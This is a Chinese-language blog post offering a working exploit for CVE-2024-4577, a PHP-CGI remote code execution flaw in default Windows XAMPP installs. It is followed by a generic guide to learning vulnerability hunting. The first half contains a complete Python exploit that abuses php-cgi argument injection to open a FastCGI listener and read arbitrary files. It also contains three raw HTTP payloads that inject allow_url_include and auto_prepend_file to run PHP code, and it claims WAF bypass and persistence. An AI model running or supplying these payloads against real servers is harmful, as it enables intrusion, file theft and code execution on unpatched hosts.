全球首款利用PHP默认环境的CVE-2024-4577 PHP-CGI RCE 漏洞 EXP,支持SSRF,支持绕过WAF。

**免责声明:**由于传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

1

漏洞介绍及影响范围

2

项目简介及原理

  • 全球首款利用PHP默认环境(XAMPP)的CVE-2024-4577 PHP-CGI RCE 漏洞 EXP。

  • The world’s first CVE-2024-4577 PHP-CGI RCE exploit utilizing the default PHP environment. Sharing original exploit, supports SSRF, supports WAF bypass.

  • 实现PHP默认环境RCE。原理:cgi.force_redirect + REDIRECT-STATUS。

  • 新增原创EXP,支持绕过WAF场景的打法。原理:建立FastCGI服务端 + FastCGI协议通讯。

  • 新增原创EXP,支持SSRF场景的打法。原理:data://协议 + GET请求。

3

EXP1的优点

  • 无需 allow_url_include、auto_prepend_file、auto_append_file 即可RCE。可包含任意文件和php文件。

  • 不会出现WAF经常拦截的关键词 allow_url_include、auto_prepend_file、auto_append_file。

  • FastCGI服务端的所有通讯不会被WAF记录。

  • 监听新端口,因此实现持久化控制php服务端,独立于apache和php。

# python CVE-2024-4577-PHP-RCE.py 127.0.0.1:80``   ``import requests``import socket``import struct``import sys``   ``   ``FCGI_BEGIN_REQUEST = 1``FCGI_ABORT_REQUEST = 2``FCGI_END_REQUEST = 3``FCGI_PARAMS = 4``FCGI_STDIN = 5``FCGI_STDOUT = 6``FCGI_STDERR = 7``FCGI_DATA = 8``FCGI_GET_VALUES = 9``FCGI_GET_VALUES_RESULT = 10``FCGI_UNKNOWN_TYPE = 11``   ``FCGI_RESPONDER = 1``FCGI_KEEP_CONN = 1``   ``request_id = 1``   ``def fcgi_header(type, request_id, content_length, padding_length):`    `return struct.pack('!BBHHBx', 1, type, request_id, content_length, padding_length)``   ``def fcgi_begin_request(request_id, role, flags):`    `body = struct.pack('!HB5x', role, flags)`    `return fcgi_header(FCGI_BEGIN_REQUEST, request_id, len(body), 0) + body``   ``def fcgi_params(request_id, name, value):`    `nlen = len(name)`    `vlen = len(value)`    `body = struct.pack('BB', nlen, vlen) + name.encode() + value.encode()`    `return fcgi_header(FCGI_PARAMS, request_id, len(body), 0) + body``   ``def fcgi_end_params(request_id):`    `return fcgi_header(FCGI_PARAMS, request_id, 0, 0)``   ``def fcgi_stdin(request_id, data):`    `body = data.encode()`    `return fcgi_header(FCGI_STDIN, request_id, len(body), 0) + body``   ``def fcgi_end_stdin(request_id):`    `return fcgi_header(FCGI_STDIN, request_id, 0, 0)``   ``def send_request(host, cgi_bind_port, script_filename):`    `sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)`    `sock.settimeout(5)`    `sock.connect((host, int(cgi_bind_port)))`    `params = {`        `'SCRIPT_FILENAME': script_filename`    `}``   `    `sock.sendall(fcgi_begin_request(request_id, FCGI_RESPONDER, 0))``   `    `for name, value in params.items():`        `sock.sendall(fcgi_params(request_id, name, value))`    `sock.sendall(fcgi_end_params(request_id))``   `    `sock.sendall(fcgi_end_stdin(request_id))``   `    `response = b''`    `while True:`        `data = sock.recv(1024)`        `if not data:`            `break`        `response += data``   `    `sock.close()`    `return response``   ``def exp1(host, http_port, cgi_bind_port):`    `url = 'http://{}:{}/php-cgi/php-cgi.exe?%adb{}:{}'.format(host, http_port, host, cgi_bind_port)`    `try:`        `r = requests.get(url, headers={'User-Agent':'', 'Redirect-Status': 'XCANWIN'}, timeout=2)`    `except Exception as e:`        `pass``   ``def exp2(host, cgi_bind_port, script_filename):`    `response = send_request(host, cgi_bind_port, script_filename)`    `print(response.decode(errors='ignore'))``   ``   ``host, http_port = sys.argv[1].split(":")``script_filename = "C:/windows/system.ini" # can include *.php file``cgi_bind_port = "9999"``   ``exp1(host, http_port, cgi_bind_port)``exp2(host, cgi_bind_port, script_filename)

4

各种EXP

EXP1

可用于绕过WAF场景 + 默认场景:

python CVE-2024-4577-PHP-RCE.py 127.0.0.1:80

EXP2

可用于SSRF场景 + 默认场景:

http://PhpVulnEnv/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"

EXP3

可用于默认场景:

POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1``Host: PhpVulnEnv``   ``<?php die("Te"."sT");?>

EXP4

可用于默认场景:

POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1``Host: PhpVulnEnv``REDIRECT-STATUS: XCANWIN``   ``<?php die("Te"."sT");?>

5

漏洞复现

1、服务端环境:

XAMPP Windows版 8.2.12

2、服务端下载并安装 XAMPP:

https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1``   ``或者自主去这里挑受影响版本:https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/

3、服务端配置

无需任何修改,保持默认配置

4、客户端使用EXP

使用上述EXP进行测试

5、验证

观察是否返回字符串 "TesT" 或者服务端system.ini文件内容

6

永久网安资料库

[

有了这个超强助手,没人比你更懂网络安全攻防

](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247506965&idx=1&sn=366f58b269521ca0b59708c5d7b2687c&chksm=c09aaf45f7ed26536034f05320ff48ef67ef785c616acd89c7f2ca6ced196bc0669ecd615c6e&scene=21#wechat_redirect)

7

往期精彩

[

记某菠菜管理后台登录测试思路

](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247507182&idx=1&sn=8c39270b742cc325d1d3af198440ec60&chksm=c09aafbef7ed26a84874d5a776f76dad9742e379c390e7c38d64576bfceafe093f58a991e3da&scene=21#wechat_redirect)

[

去中心化远程控制工具,通过ENS实现了配置文件分发的去中心化,通过Telegram实现了服务端的去中心化

](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247507167&idx=1&sn=27a2238e1d2948922df170265d974ded&chksm=c09aaf8ff7ed26993ea5ca4e78706c987c8d8c87372d1e5bea471d26cabd51c4e78e533fa4df&scene=21#wechat_redirect)

[

最新Hikvision海康威视综合漏洞利用工具


漏洞挖掘怎么学?怎么挖漏洞?怎么渗透?

较合理的途径应该从漏洞利用入手,不妨分析一些公开的 CVE 漏洞。很多漏洞都有比较好的资料,分析研究的多了,对漏洞的认识自然就不同了,然后再去搞挖掘就会易上手一点!

俗话说:“磨刀不误砍柴工”,就是这么个理儿。

那么这篇文章就教大家怎么从零到挖漏洞一条龙学习!学到了别忘了给个赞

图片

什么是漏洞挖掘

漏洞挖掘是指通过分析软件、系统或网络中存在的安全漏洞来发现并利用这些漏洞。漏洞挖掘是信息安全领域的一项重要工作,可以帮助企业和组织提高系统的安全性,避免黑客攻击和数据泄露。

漏洞挖掘的流程一般可以概括为以下几个步骤:

在这里插入图片描述

确定目标:确定要挖掘的软件或系统。这可能是一个应用程序、操作系统、网络设备或其他系统。

收集信息:收集有关目标的信息,包括架构、协议、版本和配置等。这些信息可以通过互联网搜索、手动扫描、自动化工具和其他途径获得。

分析漏洞:通过手动和自动化技术进行漏洞分析,识别潜在的漏洞类型和攻击面。漏洞类型可能包括缓冲区溢出、SQL 注入、跨站点脚本、文件包含、代码注入等等。

验证漏洞:验证已经识别的漏洞。这通常涉及到构建漏洞利用代码,并尝试在目标系统上运行以确定漏洞是否存在。

编写报告:对于已经验证的漏洞,需要编写漏洞报告。报告应该包括漏洞的描述、影响、利用难度和建议的修复方法等。

报告漏洞:将漏洞报告发送给目标系统的所有者或运营者。通常,这些信息将发送给该系统的安全团队或责任人。

跟踪漏洞:跟踪漏洞的修复进度,并监视其状态。如果漏洞得到修复,可以对修复进行验证以确保漏洞已被彻底解决。

需要注意的是,漏洞挖掘是一项需要长期持续学习和实践的工作。要成为一名优秀的漏洞挖掘者,需要不断学习新的技术和方法,并保持良好的思维习惯和创新能力。

学习漏洞挖掘的正确顺序

当然,学习漏洞挖掘之前,需要掌握以下几个方面的内容:

在这里插入图片描述

编程语言和计算机基础知识

在漏洞挖掘过程中,挖掘者需要编写代码来验证和利用漏洞,因此需要至少掌握一种编程语言,如 C、Python、Java 等。同时,还需要了解计算机的基础知识,例如计算机系统的组成结构、操作系统的原理、计算机网络的基本概念、数据库的工作原理等。如果没有这方面的基础知识,就很难理解漏洞挖掘中所需要的各种技术和工具。

安全基础知识

漏洞挖掘是一项安全工作,因此需要掌握一些安全基础知识,例如 Web 安全、网络安全、应用程序安全、二进制安全等。建议挖掘者先学习一些基础的安全知识,例如 OWASP Top 10 漏洞、常见的网络攻击技术和漏洞类型等,这可以帮助挖掘者更好地理解漏洞挖掘中所面临的问题和挑战。

漏洞挖掘工具

学习漏洞挖掘需要掌握一些常用的漏洞挖掘工具,例如 Burp Suite、Metasploit、Nmap、Wireshark、IDA 等。这些工具可以帮助挖掘者加速漏洞挖掘的过程,同时也能帮助挖掘者深入理解漏洞的原理和产生的原因。例如,Burp Suite 可以帮助挖掘者拦截和修改 HTTP 请求,Metasploit 可以帮助挖掘者构造攻击载荷等。

学习漏洞挖掘技巧和方法

学习漏洞挖掘需要了解一些常用的技巧和方法,如 Fuzzing、代码审计、反向工程、漏洞利用等。这些技巧和方法能够帮助挖掘者更快速地发现漏洞,并且深入理解漏洞的原理和利用方式。例如,Fuzzing 可以帮助挖掘者通过自动生成大量的输入数据,来测试程序是否存在漏洞,代码审计可以帮助挖掘者通过分析代码来发现漏洞等。

总的来说,学习漏洞挖掘需要综合掌握多方面的知识,包括编程、计算机基础知识、安全基础知识、漏洞挖掘工具以及漏洞挖掘技巧和方法。建议先从基础知识入手,逐步深入学习,不断实践,并在实践中发现和解决问题,才能逐渐成为一名优秀的漏洞挖掘者

五. 写在最后

希望这篇文章在可以帮助你解开一些对于漏洞挖掘的谜团。在学习和研究漏洞挖掘的过程中遇到困难并感到不知所措是很正常的。不过学习的过程就是这样,只有不断的去尝试才会进步。祝你在漏洞挖掘的路上走的越来越远。

《网络安全/黑客技术学习资源包》全套学习资料免费分享,需要有扫码领取哦!

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值